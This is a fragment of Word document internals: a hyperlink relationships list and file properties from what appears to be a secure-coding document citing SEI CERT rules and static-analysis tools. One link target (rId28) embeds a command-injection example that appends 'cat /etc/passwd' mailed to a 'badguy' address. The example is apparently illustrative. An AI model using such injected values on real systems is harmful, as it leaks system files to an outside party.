Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/LDRA" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Parasoft" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Rose" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152428" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Helix+QAC"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iki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/LDRA" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:bogus@addr.com;%20cat%20/etc/passwd%20%20|%20mail%20some@badguy.net" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Helix+QAC" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Parasoft" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcruleint35c.html" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=125337650" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.roguewave.com/documentation/klocwork/en/current/certcandcsecurecodingstandardidsmappedtoklocworkcandccheckers/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/Parasoft" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcoop52cpp.html" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/PC-lint+Plus"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LDRA" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcruleint30c.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcrulestr30c.html" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.roguewave.com/documentation/klocwork/en/current/certcandcsecurecodingstandardidsmappedtoklocworkcandccheckers/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcrec.str02c.html" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/LDRA" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/LDRA" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId64"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iki.sei.cmu.edu/confluence/display/cplusplus/Polyspace+Bug+Finde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rec.dcl12c.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/PC-lint+Plus" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/cplusplus/PVS-Studio" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcerr51cpp.html" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/LDRA" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Helix+QAC" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mathworks.com/help/bugfinder/ref/certcrulestr38c.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29</Pages>
  <Words>5816</Words>
  <Characters>33154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Alex Elbogen</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-14T02:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-14T05:26:00Z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